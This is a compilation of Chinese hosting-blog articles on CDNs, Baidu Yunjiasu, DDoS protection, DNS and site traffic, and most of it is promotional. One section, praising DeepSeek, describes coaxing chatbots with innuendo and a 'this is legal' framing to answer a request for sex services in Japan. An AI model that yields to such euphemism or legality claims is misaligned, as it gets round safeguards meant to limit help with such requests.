缓存未命中:当用户访问某个页面时,CDN会尝试从其缓存中获取内容。如果缓存中没有所需的内容,用户需要等待源服务器返回数据,这会导致加载速度变慢。这是因为CDN的缓存是为了减少源服务器的负载和提高用户访问速度而设计的。如果缓存未命中,CDN需要从源服务器获取内容,这可能会增加延迟和传输时间。 网络延迟:虽然CDN可以将内容分发到全球各地,但在某些情况下,用户距离源服务器的地理位置可能比距离最近的CDN节点更近。在这种情况下,直接访问源服务器可能会更快。这是因为CDN节点的数量可能很大,而且分布在世界各地,因此用户可能需要从较远的地方获取内容,从而增加延迟。 CDN节点负载:如果CDN节点的负载过高,可能会导致处理速度变慢,从而影响用户体验。这是因为CDN节点需要处理大量的请求和数据传输,如果负载过高,可能会导致延迟和性能下降。 SSL证书处理:如果CDN没有正确处理SSL证书,可能会导致额外的延迟和安全风险。这是因为SSL证书的处理需要额外的计算和资源,如果CDN没有正确处理,可能会导致延迟和安全问题。 内容压缩和优化:CDN可能不会对内容进行充分的压缩和优化,这可能会导致传输的数据量较大,从而增加加载时间。这是因为CDN需要处理大量的数据传输,如果内容没有进行压缩和优化,可能会导致传输时间变长。 总之,使用CDN加载速度可能会更慢的原因有很多,包括缓存未命中、网络延迟、CDN节点负载、SSL证书处理和内容压缩和优化等。为了获得最佳性能,建议定期评估CDN的性能,并根据需要进行优化和调整。这可能包括优化缓存策略、选择合适的CDN提供商、确保SSL证书的正确处理以及对内容进行压缩和优化等。 #### 为什么使用百度云加速后网站页面出现502源站错误 最近主机吧在帮一位客户做防御的时候,发现客户接入百度云加速后,部分内页访问出现502源站网关错误的情况,如下图: 通过检查我们发现客户服务器装的是宝塔面板,而面板里装有宝塔防火墙。 主机吧以为客户并没有给防火墙加IP白名单所致,后来发现客户早就把百度云加速的IP段加白了。 于是我们尝试把网站防火墙关了。 然后刷新百度云加速全站缓存 发现居然正常了,从这个案例我们可以得出,宝塔防火墙是会拦截百度云加速IP节点的,哪怕你加了白名单也会有这个问题,这个可能是百度云加速与宝塔防火墙的兼容性并不好的原因。 所以,建议网站开启百度云加速后最好把宝塔防火墙关了,以免造成误拦截的情况。 #### 为什么使用百度云加速网站经常出现访问不了情况 经常有站长使用百度云加速后抱怨经常出现访问不了的情况,但官方又解决不了。 其实很多时候并不是百度云加速节点问题,因为很多时候是因为百度云加速节点连接你源站的服务器不稳定导致的。 那么知道原因其实是很好解决的,只要购买一台稳定的服务器问题就好解决了。 当然宽带也必须要大,很多站长都用1M宽带的服务器,1M宽带都不够云加速节点缓存几下就满了,更别说其它的了。 还有一些客户使用的美国香港服务器,要知道百度云加速节点是国内的,要连接海外主机是有延迟的,这也有可能会导致连接不上。 虚拟主机使用百度云加速确实起到不错的加速效果,但不稳定的虚拟主机使用百度云加速也会常常出现访问不了 也有部份原因是源服务器受到攻击,比如DDOS,CC攻击,这些都是流量攻击,使服务器CPU 内存宽带等占满,达到访问不了目的。遇到攻击我们要做的是把已经暴露的IP更换掉,然后使用百度云加速进行隐藏防护。同时必要时升级宽带等配置,像那些1核1G1M配置的服务器就算百度云加速可以拦截大部的攻击,本身源服务器也会因为配置太低,而访问不了的。 使用百度云加速我们推荐使用纯电信或者纯联通的服务器,单线所谓,但宽带必须大,像那种10M以上独享的服务器使用百度云加速就会非常稳定。 使用百度云加速本身就可以实现多线效果,其实不一定要BGP多线。 #### 为什么刚搜索完就接到推销电话?百度安全大佬这样说 相信很多人都有这样的经历,刚刚在百度搜索了某个内容,不一会儿就会有相关的推销电话打到你的手机上。想必很多用户肯定会心生疑窦:是不是百度卖了我的号? 对于这样一个场景,今天百度安全总经理马杰在跟媒体沟通时郑重“喊冤”。 “就连自己身边的朋友都有很多来问这个问题,是不是百度透露了用户的个人信息,这已经影响到百度的用户体验了。这几年我们花了很多精力研究清楚了这个事情背后的原因。”马杰称。 马杰介绍,研究下来发现背后原因其实很简单:很多网站站长为了获得更好的引流效果,往往会去网络上购买一些所谓的“营销工具”。事实上这些营销工具是一个“黑客工具”。安装上这个工具后,每个用户去访问这个网站,他们就会利用一些黑客手法获取这个用户的电话号码、邮箱、QQ号等,特别好用。而卖营销工具的这些人会跟买了的这些站长说,这个号码是从百度来的,站长们肯定信了。实际上这整个事情跟百度没有一毛钱关系。 “但是这个确实影响到百度产品的用户体验。我们做了三件事情。“马杰称:“一是一旦检测到网页中存在窃取用户隐私的行为,就会把这个网站降权,同时百度会给出风险提示,说这个网站存在可能窃取用户行为的可能性。二是,对于故意制造黑客工具窃取用户隐私触犯法律的,百度是尽量配合公安机关进行打击,通过固定证据配合公安机关做了几期的‘净网行动’。 三是,做黑客工具所利用这些漏洞也要修复解决。百度会分析出来漏洞,不断的分享给运营商和友商,让他们把相关漏洞修复,从源头上解决问题。” 同时,马杰强调,经过上述三层的工作,现在大家可能会感到这种情况已经非常少了。但是任何时候,只要有利益存在,就一定还会有人铤而走险,这种对抗会长期持续下去。 目前,百度安全每天会为用户提供 100 亿次实时的访问保护,每年会拦截用户搜索风险 411 亿次,同时,百度安全累计已经开展了超过 100 起的黑产打击专项行动,并配合公安机关破获了多起网络黑产相关的案件。 此外,对于普通的上网用户,马杰也提出几点安全建议:首先,密码设置不要太简单。为了便于记忆,可以将做几组不同安全级别的密码,比如银行的支付密码是一个级别,普通系统一个级别等等;另外很重要的一点是时刻要保有安全意识;此外,中老年人网络安全意识普遍较低,在扫描二维码等促销活动面前没有抵抗力,及容易让个人数据和信息被骗走,子女们一定要多多帮助父母树立安全意识。 #### 为什么我推荐站长使用114公众DNS 公众DNS估计很多站长会陌生,所谓公众DNS其实就是设置在本地电脑上的DNS,主要作用是用来实现解析网站的IP的,使本地电脑可以访问互联网上的网站。可以说公众DNS是非常重要的,如果公众DNS故障了,那么我们就没办法访问网站。很多站长使用的都是电信运营或者网管帮设置的DNS,其实安全隐患非常大。我们所说的DNS劫持就是因为那些DNS设置了广告,让你在访问网站的时候有时候会弹出广告。这个利润是很高的,假如一个城市的DNS都一天弹出一个广告,那展示量就高达几百上千万,一天就几十万广告费不是什么问题。很多本地电信运营商就是看到这么高的利润,给本地的DNS上广告,甚至有些电信网管在给用户装电脑的时候擅自设置带有广告的DNS。而114DNS 的优势高速 电信联通移动全国通用DNS,能引导您到最快的网站,手机和计算机都可用稳定 DNS解析成功率超高,与ISP的DNS相比,能访问更多的国内外网站可靠   3000万个家庭和企业DNS的后端技术支持,多次为电信运营商提供DNS灾备纯净 无劫持   无需再忍受被强扭去看广告或粗俗网站之痛苦服务地址为:114.114.114.114 和 114.114.115.115国内很多公众DNS,比如百度公众DNS、腾讯公众DNS、阿里公众DNS,为何主机吧推荐114呢?其实如果经常做网站的朋友就会经常遇到改域名的解析的时候,别人一改解析IP,没几分钟就生效可以访问了,而自己的电脑要等半小时甚至12小时以上才生效。其根本原因是本地电信运营商的DNS为了减少服务器压力,设置了几个小时才生效的时间,而114DNS就不会,全国各地DNS生效时间基本都是半小时内。对于效率要求高的站长来说,114DNS是不错的选择。windows电脑更换DNS服务器教学MAC OS 更换DNS服务器教学  #### 为什么接入了高防IP,却防不住DDOS?如何选择高防IP 最近,主机吧这边很多咨询高防的IP的同学,有同学在使用高防IP的时间,依然被DDOS,今天主机吧来讲讲使用高防IP的注意事项,如何选择高防IP。 使用高防IP防不了DDOS的原主因一般有三个: 一:源机IP暴露 很多同学在服务器被攻击后,直接买高防IP直接套进去就用了,这就导致了原来的IP是被黑客知道的,黑客知道IP后,是可以直接绕过高防IP进行攻击的,所以我们在使用高防IP的同时,要把原来的服务器IP更换一个新的进行转发隐藏,同时我们所有对外业务都要用高防IP进行转发,而不是直接用源服务器IP转发,以免被黑客查到源服务器IP。 二:攻击超过防护值 购买高防IP的时候没有预估好黑客攻击的流量峰值有多大,比如买的30G的峰值的高防IP,实际攻击却高达100G以上,这个时候高防IP会进入封堵,导致无法访问,所以在购买高防IP的时候要大概预估下攻击的峰值,如果不知道的可以咨询下主机吧。 三:不靠谱的服务商 一些卖高防的服务商打着超高防御,价格便宜的幌子,实际真实防御非常低,一但超过攻击量就会叫你加钱升级,所以选择高防服务商的时候要小心。 那么我们要如何选择高防IP呢?主机吧这里有些心得: 1.问清楚攻击超量后封堵多长时间恢复 这个很重要,因为一些高防机房一但IP超量后会封几个小时或者24小时,这个时候黄花菜都凉了,像主机吧这边的华北机房就是封堵24小时,而华东的机房也就十几分钟就自动恢复了。 2.咨询是否封堵上层UDP流量 这个相当重要,如果你只是网站用户或者一些TCP游戏业务,不需要用到UDP,那么选择上层封堵UDP流量的高防IP非常重要的,因为UDP流量是非常大的,黑客可以利用UDP流量打到几百G到1T的流量都有可能。比如主机吧这边的华东机房的高防IP就是封堵UDP流量的,天然减少攻击流量。 3.咨询是否上层封堵海外流量 这个也很重要,如果你的业务没有海外用户,那么封堵海外流量非常重要,海外的DDOS流量平台非常的多,而且可以很便宜的价格攻击很大的流量,所以90%的DDOS流量来源于海外,因此封堵海外可以减少90%的攻击流量。 4.高防IP线路区别 目前市面上的高防IP有联通单线、电信单线、BGP多线,一些用户是移动网络访问较多的,一定要选择BGP多线,因为移动网络的如果是其它网络的高防IP的话,访问会很慢。 5.不要贪便宜 一些用户在淘宝上看到有卖家卖几百块可以防几百G的攻击,这主机吧这里只想说,千万别上当,那都是虚的,如果是真实防御的话,不可能这么便宜的,极有可能是共享的高防,别人使用这个高防IP受攻击后会影响到你的业务,得不偿失。 好了,如何选择高防IP就说到这里了,有什么不懂的都可以咨询主机吧。 #### 为什么百度云加速DDOS/CC防护攻击这么便宜 DDoS全名是Distributed Denial of Service,即分布式拒绝服务攻击。它是将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击(DoS攻击即为导致服务器拒绝服务的攻击方式),用来堵塞被攻击者上网带宽或者消耗服务器资源的方法,令服务器拒绝响应正常的服务请求,从而使网站无法正常访问。 DDOS攻击对于服务器和网站危害大,会对公司造成相当大的损失,有调查分析显示,一个单个的DDoS攻击将对企业造成至少40万美元的伤害,有38%的DDoS攻击的受害者无力保护其核心业务免遭攻击。 CC是攻击者借助代理服务器生成指向受害主机的合法请求,实现DDOS和伪装就叫:CC(ChallengeCollapsar)。 CC主要是用来攻击页面的。大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越多,论坛的页面越多,数据库压力就越大,被访问的频率也越高,占用的系统资源也就相当可观。 在百度云加速还没出来的时代,对付CC攻击很多服务商都是通过直接关闭虚拟机,解绑服务器来处理。 这样的后果就是网站会被停一两天,如果一遇到攻击,那么网站可能就没办法运营了,服务商甚至以此为由关闭你的虚拟机。而专业的DDoS防护服务价格是非常昂贵的,比如阿里云的高防服务,一个月最低版的就高达6800元。 而自从百度云加速出来后,我们的防护成本低了很多,比如百度云加速专业版的官方价格2490元/年,而主机吧这边代理购买1180元/年,价格可以说是低于阿里云的百倍以上。 为什么这么便宜呢?其实并不是百度云便宜,而是阿里云贵,国内能技术有能力部署防护的公司属来属去也就那几家,阿里云占着物以稀为贵的道理,一直都是卖得比成本价高达几十上百倍的价格,加上阿里云品牌优势,很多客户是愿意花钱买防护的。记得有一次双11的时候,阿里云做活动防护产品居然卖到平时价格的1折,难道亏本卖?显示不可能,所以我们可以说阿里云防护产品是利润非常高的。当然啦,如果客户自己买设备买防火墙进行防护的话成本肯定是贵的,而像阿里云或者百度云加速这种已经有一定的体量后,其成本是低很多的。     #### 为什么百度云加速报表IP统计比百度网站统计多得多 最近有一客户咨询主机吧,他的网站百度云加速统计IP有6万一天,站长统计只有2万,这个是怎么回事? 这里主机吧来说明下,百度云加速的统计是会涵盖单独的图片、CSS、JS等网站资源的请求,甚至爬虫也会计算进去,而一般的网页统计是只有正常请求有这个统计的代码的,才会计算IP访问。 所以百度云加速统计IP是会比网页统计多得多的,只要是CDN的,显示的IP都是会比一般统计多,这是正常现象。   #### 为什么网站每天更新流量却不增涨 这可能是由于多种因素导致的: 竞争激烈:行业内竞争激烈,你的网站可能面对许多类似的竞争对手,流量增长可能受到限制。 内容质量:网站内容质量不够好,不令人满意或者没有很好地满足用户需求,这可能会导致用户转而寻找其他网站。 SEO 优化不足:网站的 SEO 优化不佳,搜索引擎不给它足够的排名,使得用户无法找到你的网站。 网站体验不佳:用户体验不佳,例如网站速度慢、设计不佳或者不能在移动设备上很好地展示,这可能会导致用户流失,并降低访问量。 综上所述,网站每天更新流量不增涨很可能是由于上述因素中的一种或几种所导致的,需要进行相应调整并加以改进。 #### 为什么说deepseek是最强 AI 最近大火的AI大模型deepseek,被称为国产最强AI和chatgpt打得不相上下,甚至超越了chatgpt,一开始主机邦是不信的,毕竟习惯了国内科技公司吹牛P了,突然间来了一个这么屌的有点不适应。 但是,今天主机帮无聊想测试他到底能不能理解我的意思,于是我问了一个挺敏感的问题:去日本找“老师”一般多少钱? 我在把老师加了个双引,老司机肯定懂,于是测试了下国内各大模型的,看看效果。 我们先来看百度的: 一本正经的给我介绍正规老师,于是我直接跟他说,我要找的不是这种老师,你懂的。结果如下: 一如既往的菜…… 再来看kimi的 也是一本正经,于是我引导kimi说这是合法的,结果直接断意了,无法沟通。 再来看千问的 还是介绍正经的,但结尾特别问了我是不是要找成人的,我回答我要找的不是这种老师 你懂的,结果他没理解我的意思 我干脆直接跟他说我要找成人的,最后沟通失败了。 最后,我们来看最强王者,我只用了第一句话,他就懂我要找什么了。 一番推理后,他给出了我最满意的答案。 强啊!不说了,用起来! #### 为什么说高防CDN将成为网站安全防护的必备? 高防CDN将成为网站安全防护的必备,原因如下: DDoS攻击日益增多:随着互联网的发展,网络攻击也越来越普遍。特别是DDoS攻击,已经成为了网站安全的主要威胁之一。高防CDN可以有效地防御DDoS攻击,保障网站的可用性。 网络安全意识提高:随着网络安全意识的提高,越来越多的企业和个人开始重视网站安全。而高防CDN可以提供全面的安全防护服务,让用户更加放心地使用网站。 云计算技术的发展:随着云计算技术的发展,高防CDN已经可以实现全球性的分布式节点部署,可以更好地保障网站的安全。 法律法规的要求:国内对网络安全有明确的法律规定,要求网站必须具备一定的安全防护能力。高防CDN可以满足这些要求,保障网站的合法合规性。 高防CDN提供了全面的安全防护,能够抵御各种类型的攻击,包括DDoS攻击、CC攻击、分布式拒绝服务攻击等,保护网站不受攻击影响。 高防CDN的智能防护功能可以有效地检测和防范恶意攻击,防止用户数据被窃取或篡改,确保用户数据安全。 高防CDN可以通过流量清洗和日志监控等方式,对攻击进行及时处理,迅速发现和解决问题,提高网站的安全性和可靠性。 高防CDN具有全球覆盖的特点,可以抵御全球范围内的攻击,提高了网站的安全性和可靠性,避免了单点故障带来的风险。 综上所述,高防CDN将成为网站安全防护的必备,因为它可以有效地防御DDoS攻击、提高网络安全意识、满足法律法规的要求,同时也可以提供全面的安全防护服务,让用户更加放心地使用网站。 主机吧推荐使用高防CDN品牌: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### 为什么说高防CDN的DDOS防御能力比高防IP强 DDOS攻击是一种分布式拒绝服务攻击,是指攻击者利用多个受控的主机向目标服务器发送大量的请求,造成目标服务器资源耗尽,无法正常提供服务。DDOS攻击是互联网上最常见和最危险的网络攻击之一,给网站运营者带来了巨大的损失和困扰。为了抵御DDOS攻击,网站运营者通常会选择使用高防产品,如高防IP和高防CDN。高防IP是指具有高防御能力的IP地址,可以将攻击流量转移到高防IP上,保护源站服务器。高防CDN是指具有高防御能力的内容分发网络,可以将网站内容分发到多个节点上,让用户就近访问,并隐藏源站IP。那么,高防CDN和高防IP有什么区别呢?为什么说高防CDN的DDOS防御能力比高防IP强呢?以下是一些主要的原因:## 高防CDN具有多节点分流的优势高防CDN是通过部署在各地的边缘节点,来实现内容分发和流量分流的功能。当网站遭受DDOS攻击时,高防CDN可以根据攻击类型和规模,动态调度流量到不同的节点上,实现多点分散防御。这样可以有效地分摊和缓解单点压力,提高整体的抗攻击能力。而高防IP则是通过单个或少数几个IP地址来承担所有的流量,当遇到超大规模的攻击时,可能会出现单点故障或者性能下降的情况。而且,如果攻击者知道了源站IP或者备用IP,就可以绕过高防IP直接攻击源站服务器,造成更大的危害。## 高防CDN具有智能清洗和识别的优势高防CDN不仅可以分发和分流流量,还可以对流量进行智能清洗和识别。高防CDN可以根据流量特征、行为模式、来源地域等多维度的数据分析,来区分正常流量和异常流量,并对异常流量进行拦截、过滤、限制等处理。这样可以有效地减少无效流量对源站服务器的影响,保证正常用户的访问体验。而高防IP则只能简单地将所有流量转移到自己上面,并不能对流量进行深入的清洗和识别。这样可能会导致一些正常流量也被误伤或者延迟,影响用户体验。而且,如果攻击者使用了更加隐蔽和复杂的攻击手段,如伪造合法请求、变换攻击源等,高防IP可能无法有效地识别和识别。这样可能会导致高防IP的防御效果降低,甚至被攻破。## 高防CDN具有网站加速和优化的优势高防CDN除了具有防御攻击的功能,还具有网站加速和优化的功能。高防CDN可以根据用户的地理位置、网络状况、设备类型等因素,动态选择最佳的节点来提供服务,从而缩短用户的访问延迟,提高网站的响应速度。同时,高防CDN还可以对网站内容进行压缩、缓存、预加载等优化处理,进一步提升网站的性能和稳定性。而高防IP则只能提供基本的流量转发功能,并不能对网站内容进行加速和优化。这样可能会导致网站在不同地区或不同网络环境下的访问速度不一致,影响用户体验。而且,如果网站内容过大或过多,高防IP可能无法承载所有的流量,导致网站出现卡顿或者崩溃。综上所述,高防CDN相比高防IP,具有多节点分流、智能清洗识别、网站加速优化等多方面的优势,因此在DDOS防御能力上也更强。当然,并不是说高防IP就没有用处了,对于一些对网站加速要求低、对DDOS攻击规模不明确、与源站频繁动态交互的用户,如游戏业务、小型推广网站、外部业务系统等,高防IP也是一种可行的选择。总之,根据自己的实际需求和预算,选择合适的高防产品,才能有效地保护自己的网站安全。 #### 为什么谷歌蜘蛛总是刷我网站的非法搜索关键词 谷歌蜘蛛(Googlebot)频繁刷你网站的“非法搜索关键词”,通常不是它“故意”为之,而是你的网站存在可被恶意利用的搜索入口,被第三方操控或诱导生成了大量带有非法关键词的URL,而这些URL又被谷歌发现并尝试抓取。 ✅ 真实原因分析如下: 1. 你的网站搜索功能被“刷词”了 攻击者或灰产利用你网站的站内搜索接口(如 /search?q=非法关键词),批量生成大量包含非法关键词的URL。 这些URL会被谷歌蜘蛛发现(比如通过外链、站点地图、甚至是你自己网页上的链接),于是谷歌就会尝试抓取这些页面。 看起来就像“谷歌蜘蛛在刷非法关键词”,其实是它被动抓取了别人制造的垃圾链接。 2. 你没有屏蔽搜索结果的抓取 很多网站没有禁止搜索引擎抓取搜索结果页,导致这些“垃圾搜索页”被谷歌收录。 谷歌一旦收录,就会定期回访这些页面,造成“反复刷”的假象。 ✅ 如何确认是不是这个问题? 你可以: 查看服务器日志,搜索 66.249.64.X的访问记录,看是否大量访问了 /search?q=XXX 这类路径。 在谷歌搜索 site:你的域名 非法关键词,看是否出现了大量你根本没做过的搜索结果页。 ✅ 如何阻止? 操作说明✅ robots.txt 屏蔽搜索页禁止谷歌抓取 /search 路径:Disallow: /search✅ <meta name="robots" content="noindex">给搜索结果页加上 noindex,防止被收录✅ 搜索页加验证码或登录限制防止被自动化刷词✅ 清理已收录的垃圾页用 Google Search Console 提交“移除请求” ✅ 总结一句话: 不是谷歌蜘蛛在“刷”你,而是别人利用你网站的搜索功能生成了非法关键词页面,谷歌只是来抓取了这些页面。 #### 为什么越来越多网站使用CDN加速?CDN加速有什么作用? 现在,越来越多的用户建站购买云服务器时,都会额外的购买CDN加速,网站使用CDN加速已经逐渐成为一种新的趋势。那么,为什么网站要使用CDN加速?CDN加速有什么作用呢?解决这个问题,我们需要先了解的是,网站访问为什么会变慢? 在互联网有一个许多人都知道的“8秒原则”,就是如果一个页面的加载时间超过了8秒,那么大部分的用户就会觉得不耐烦,加载的时间太长,就会出现直接放弃的可能。即便是一个网站内容丰富、制作精良的网站,如果网站加载速度过慢,用户也会选择放弃访问。 网站访问过慢的原因有哪些? 网站打开速度慢受很多因素的影响,简单归纳下常见的几个原因: 1. 共享主机服务器不堪重负,响应速度慢; 2. 网站的图片和内容太大,需要花费很多时间下载; 3. 网站使用了太多不同的脚本和图片,这些脚本和图片没有针对快速加载网站进行优化,加载时间长; 4. 网站的服务器位置与您网站的访问者位于不同的地理位置。 如何解决网站访问过慢? 网站访问过慢,除了会给用户带来不好的体验感,各大搜索引擎也明确指出,网站的访问速度会影响搜索结果的排名。而解决网站访问过慢,还需要从以下方面进行优化: 1. 选择可靠的云服务商 选择一家值得信赖的云服务商和一款合适的云服务器,一家值得信赖的云服务商拥有坚实可靠的硬件,这是提高速度的必备条件。目前国内比较好的云服务商有阿里云、腾讯云、百度云、华为云,都是国内前排的云服务商,不仅速度快,稳定,还安全,非常值得信赖。 2. 优化网站图片和代码 随着用户对网站高质量图片的追求,图片尺寸成为影响网站加载速度的重要问题,注意以下几点可以优化网站图片加载速度:1、裁剪图片,缩小尺寸;2、尽量使用JPEG或者PNG格式,避免使用BMP和TIFF格式;3、调整图片的大小。 网页和网站的运用大都依赖于CSS和Java技术,减少这些文本的大小非常重要,有效的方法就是压缩它们的大小,这意味着要删除代码中的注释、多余的空格、额外的换行符和分隔符,以压缩代码。同时,减少需要传输的数据量来缩短页面加载的时间。 3. 使用CDN加速服务 CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。 那么我们通俗一点讲什么是CDN,简单一点理解就是一个中转站,在给网站主提供一定的方便,用户也可以享受到一定的方便,在提高打开网站和访问速度上面都有大大的提升,使用CDN的好处显而易见。 未使用CDN和使用CDN的区别,显然,使用CDN可以有效提高访问速度。 而百度云加速CDN则是在传统CDN加速基础上实现安全防御、加速、搜索引擎优化一体的服务。基于百度大脑清洗算法,精准识别恶意攻击,自建数T级别抗DDoS中心,25Tbps的处理能力以及散布于全球各地的上百个数据中心,同时加快百度搜索引擎的抓取和收录速度。 那么对网站而言,使用CDN加速有什么好处呢? 1、网站加速,利于搜索引擎排名 许多搜索引擎都会把网站的打开速度当做一个比较重要的指标,所以网站打开的速度会影响搜索排名。使用CDN加速之后,网站打开速度变快,就可以减少跳出率,也可以增加用户对网站的友好体验。 2、有利于提高网站的转化率 毫无疑问,用户的访问网站的时间提高了,跳出率减少了,当然会利于网站的转化率和销售量。现在大环境下的人们都比较浮躁,我想谁都没有耐心去等一个需要10秒才能打开的网站,这样的网站一开始就不友好,更别想提高网站的转化率了。 3、提升网站的稳定性和安全性 CDN加速因为节点分散,攻击者比较难下手,攻击一个节点仅仅是影响一个节点的缓存访问而已,并且百度云加速CDN的“智能调度”会自动的启用另一个节点,CDN服务节点数量够多,那么攻击者需要的流量包就会呈几何级的增加,这样攻击成本自然就高了。 可见,网站选择CDN加速会让网站的性能得到有效提升,如果你也有网络访问慢、用户体验不好,SEO排名低,易受攻击等烦恼,那不妨考虑一下百度云加速CDN,百度云加速CDN节点覆盖全球,同时支持 DDoS、CC攻击防御,拥有BGP 网络中间源,有效降低回源成本,让您的网站访问更顺畅! #### 为什么高防CDN往往防御DDOS比高防IP强 高防CDN和高防IP都是用来保护网络免受DDoS攻击的工具,但是它们的工作原理略有不同。 高防IP主要是通过防火墙、路由器等网络设备来进行攻击流量的过滤和拦截。当攻击流量达到一定程度时,防火墙等设备会将流量阻挡在网络外部,以保护受攻击的服务器。 相比之下,高防CDN不仅具备过滤拦截DDoS攻击流量的能力,还能利用其分布式架构和全球覆盖的节点,将流量分散到不同的节点上进行处理和缓存,从而降低攻击流量对单个节点的冲击。此外,高防CDN还可以通过缓存技术和内容优化,提高网站的访问速度和响应能力,增强用户体验。 因此,相对于单一的高防IP方案,高防CDN在防御DDoS攻击方面具有更高的效率和可靠性。 以下是高防CDN相比高防IP的几个优势: 全球覆盖:高防CDN可以通过其分布式架构和全球覆盖的节点,将流量分散到不同的节点上进行处理和缓存,从而降低攻击流量对单个节点的冲击,提高防御能力。 缓存优化:高防CDN可以通过缓存技术和内容优化,提高网站的访问速度和响应能力,增强用户体验。 防御能力强:相比于高防IP方案,高防CDN在防御DDoS攻击方面具有更高的效率和可靠性。 成本效益:由于高防CDN可以提供多种服务,包括防御DDoS攻击、加速内容传输等,因此可以在保证安全的同时,提高网站的性能和用户体验,具有更高的成本效益。 可定制性强:高防CDN服务商通常提供更加灵活的定制化服务,可以根据客户的具体需求进行定制,提供更加个性化的解决方案。 #### 为何已经接入百度云加速了域名访问还是源IP 最近有一客户向主机吧反馈:已经接入成功百度云加速了,但是ping域名的时候还是源服务器的IP,怎么回事呢? 经确认我们发现该用户使用的是NS接入模式,即需要修改百度云加速的DNS记录才会生效,但是某些域名商修改DNS记录生效是非常慢的,比如阿里云,修改DNS快的话要2小时才生效,慢的话要24小时左右,个别地区考虑到本地DNS更新时间,最慢的要48小时。 所以就出现了有部份地区访问是回源IP的,如果用户急着使用的话建议使用CNAME别接入,别名接入一般都是半小时左右生效的。 #### 为何用了百度云加速 服务器负载还很大 最近有个用户反馈:为啥我用了云加速 服务器负载还这么大? 查看监控我们发现的CPU使用率比较高,而带宽内存都比较低,那么原因很容易推测出来:用户网站的大量请求都是动态请求,而CDN对动态请求是会正常请求进源服务器的,也就是动态请求CDN并不会对服务器有任何减压效果。如果你的网站内容并不需要实时更新的,可以对网站的进行缓存百度云加速节点处理,这样用户请求就不需要每一次都请求回源服务器。 以下后缀文件在符合相应的cache-control的情况下会被缓存 css/js/jpg/jpeg/gif/ico/png/bmp/pict/csv/doc/pdf/pls/ppt/tif/tiff/eps/ejs/swf/ midi/mid/ttf/eot/woff/otf/svg/svgz/webp/docx/xlsx/xls/pptx/ps/class/jar 如果您设置的cache-control是“private”、”no-store”、”no-cache”、”maxage=0”或者在响应里面存储cookie,云加速都将无法缓存;单个文件如果大于100M也将不会被缓存。 如果你想缓存的文件格式并不在默认列表里,您可以通过规则自定义来实现,点击“查看报表”旁边的下拉菜单,点击“特定页面规则”,在规则自定义页面可通过规则来设置需要缓存的页面,目录及文件类型。 #### 为充实内容 百度知道开始大量匹配自家产品内容 如果经常做百度知道推广的同学,一定会注意到,一些问题下,出现了百度视频和百家号的内容。   针对这个问题,主机吧特地去看了,主要调度的都是百度百家号的内容,可能是百度百家号计划打通百度各产品系列的一些表现,未来极可能连同百度贴吧也会出现类似的操作。 总之百度为了给自家百度百家导入更多的流量已经无所不用其极,既充实了自家产品内容,也增加了百度百家流量推广,简直两全齐美,不过倒霉的是百度以外的网站了,一但百度自己的内容达到满足用户的地步了,其它网站从百度搜索引擎来流量只会慢慢变少。 当然咱也不能坐以待毙,只要有搜索就会有机会,加油建站人! #### 为加速网页加载 谷歌试图让AMP标准化 在一篇于今天发表的博文中,谷歌宣布其正式启动了一个旨在加速网页访问速度的计划,该计划试图说服网页标准制定者们采用谷歌提出的“加速移动网页”(Accelerated Mobile Pages,AMP)框架。一旦被采纳,这意味着几乎所有网页都能获得由AMP带来的好处:几乎即刻加载、自动适配多种平台等。 AMP框架试图让网页加载得更快更轻便,使得网页浏览体验就像在Facebook和Apple News中浏览已订阅的文章一样流畅。使用了AMP框架后,当你在其他平台上点击一个链接后,你无须等待其长时间的加载过程,因为那都已经提前加载好了。 通过开发AMP,谷歌走到了网页设计与开发领域的最中心,在这里有很多关心着网页未来发展方向的开发者们。而媒体出版方,即网页内容提供方则不想把太多的控制权交给大型科技公司,它们担心谷歌会成为邪恶的主宰者而不是网页世界的好心管理员。 在过去几个月内,上述出版商们的疑虑在网上流传很广,有一篇广泛传播的公开信指出谷歌应该修改AMP,博客平台Medium上也存在很多类似博文。托管AMP代码的GitHub网站上也有很多相关讨论,这些讨论则主要来自于网页开发者们。 人们消极的反馈使得谷歌AMP项目工程主管马尔特(Malte Ubl)和主管搜索业务的副总裁大卫·波斯瑞斯(David Besbris)感到有些沮丧,波斯瑞斯说:“在我们看来,AMP真的是一个公益项目。我们开发出AMP并不是想控制一切,不是其他人想的那样。想想在AMP发布之前,过去几年前那些移动网页的浏览体验是有多糟糕”。 苹果公司推出的Apple News和Facebook推出的Instant Articles是通过建立一种独有的格式,并说服内容出版商们使用这种格式在其平台上发布内容,以此达到在移动设备上流畅浏览内容的体验。 波斯瑞斯继续说:“在当时,产业界解决移动网页浏览体验不佳的办法是简陋的,它们只是各自能保证用户在自己平台内的使用体验,但这却使内容出版商们和网页付出了更大的代价。”所以谷歌的解决方案就是AMP,旨在使移动网页浏览体验与移动应用内的体验一样流畅,这将使网页重新开始与Apple和Facebook等公司展开竞争。 AMP的大致原理是这样的:当内容出版方发表了一个新网页,它将被存放在很多缓存服务器上,但这并不是AMP让网页浏览变顺畅的真正原因。当用户请求此网页时,该网页能即时加载完毕,因为它已经在后台预先加载了。在用户点击链接进入该网页前,网页出版方不会记录任何缓存信息,也不会追踪用户浏览轨迹。所以你可以信任这些预加载的网页。 自AMP发布之时起,就有许多关于它的讨论,因为其目的令人疑惑且具有争议。这也是过往那些网页标准们在确立前的必经之路。 